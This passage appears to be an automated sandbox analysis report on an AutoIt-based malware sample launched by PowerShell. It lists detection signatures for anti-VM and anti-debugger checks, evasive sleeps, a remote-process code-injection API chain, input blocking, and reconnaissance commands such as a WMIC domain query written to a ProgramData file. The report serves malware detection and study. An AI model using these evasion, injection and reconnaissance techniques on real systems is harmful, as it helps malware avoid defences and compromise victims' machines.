Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\downloads\Autoit3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4041 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5819 Jump to behavior
Found evasive API chain (date check)
Source: C:\downloads\Autoit3.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\downloads\Autoit3.exe API coverage: 4.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem
Source: C:\downloads\Autoit3.exe Code function: 3_2_00864005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00864005
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0086C2FF
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_0086494A
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_0086CD9F
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086CD14 FindFirstFileW,FindClose, 3_2_0086CD14
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0086F5D8
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0086F735
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0086FA36
Source: C:\downloads\Autoit3.exe Code function: 3_2_00863CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00863CE2
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D2F39 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_011D2F39
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D1F314 FindFirstFileW,FindNextFileW,FindClose, 3_2_03D1F314
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D1DF18 FindFirstFileW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose, 3_2_03D1DF18
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CF9DF0 FindFirstFileW,FindNextFileW,FindClose, 3_2_03CF9DF0
Source: C:\downloads\Autoit3.exe Code function: 3_2_00815D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 3_2_00815D13
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: Autoit3.exe, Autoit3.exe, 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: Autoit3.exe, 00000003.00000002.1742020740.00000000011E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1799390815.0000024DE2394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: C:\downloads\Autoit3.exe API call chain: ExitProcess graph end node
Source: C:\downloads\Autoit3.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\downloads\Autoit3.exe Code function: 3_2_008745D5 BlockInput, 3_2_008745D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\downloads\Autoit3.exe Code function: 3_2_00815240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 3_2_00815240
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\downloads\Autoit3.exe Code function: 3_2_00835CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_00835CAC
Contains functionality to dynamically determine API calls
Source: C:\downloads\Autoit3.exe Code function: 3_2_0087C6D9 LoadLibraryA,GetProcAddress, 3_2_0087C6D9
Contains functionality to read the PEB
Source: C:\downloads\Autoit3.exe Code function: 3_2_011DFB3A mov eax, dword ptr fs:[00000030h] 3_2_011DFB3A
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CEC0EC mov eax, dword ptr fs:[00000030h] 3_2_03CEC0EC
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CEC0EC mov eax, dword ptr fs:[00000030h] 3_2_03CEC0EC
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CF6FD8 mov eax, dword ptr fs:[00000030h] 3_2_03CF6FD8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\downloads\Autoit3.exe Code function: 3_2_008588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 3_2_008588CD
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0082A385
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082A354 SetUnhandledExceptionFilter, 3_2_0082A354

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CEFBF0 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle, 3_2_03CEFBF0
Contains functionality to inject threads in other processes
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CEFBF0 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle, 3_2_03CEFBF0
Contains functionality to execute programs as a different user
Source: C:\downloads\Autoit3.exe Code function: 3_2_00859369 LogonUserW, 3_2_00859369
Contains functionality to launch a program with higher privileges
Source: C:\downloads\Autoit3.exe Code function: 3_2_00815240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 3_2_00815240
Contains functionality to simulate keystroke presses
Source: C:\downloads\Autoit3.exe Code function: 3_2_00861AC6 SendInput,keybd_event, 3_2_00861AC6
Contains functionality to simulate mouse events
Source: C:\downloads\Autoit3.exe Code function: 3_2_008651E2 mouse_event, 3_2_008651E2
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x Jump to behavior
Source: C:\downloads\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain Jump to behavior
Source: C:\downloads\Autoit3.exe Code function: 3_2_008588CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 3_2_008588CD
Source: C:\downloads\Autoit3.exe Code function: 3_2_00864F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 3_2_00864F1C
Source: Autoit3.exe, 00000003.00000000.1713595565.00000000008B6000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Autoit3.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082885B cpuid 3_2_0082885B
Contains functionality to query locales information (e.g. system language)
Source: C:\downloads\Autoit3.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_011D3111
Source: C:\downloads\Autoit3.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_011D321B
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA, 3_2_011D3521
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA, 3_2_011D5439
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA, 3_2_011D5485
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA,GetACP, 3_2_011D6695
Source: C:\downloads\Autoit3.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_03CC5C24
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA, 3_2_03CC6578
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA, 3_2_03CCCBE4
Source: C:\downloads\Autoit3.exe Code function: GetLocaleInfoA, 3_2_03CCB5C8
Source: C:\downloads\Autoit3.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_03CC5D2E
Queries information about the installed CPU (vendor, model number etc)
Source: C:\downloads\Autoit3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\downloads\Autoit3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\downloads\Autoit3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\downloads\Autoit3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
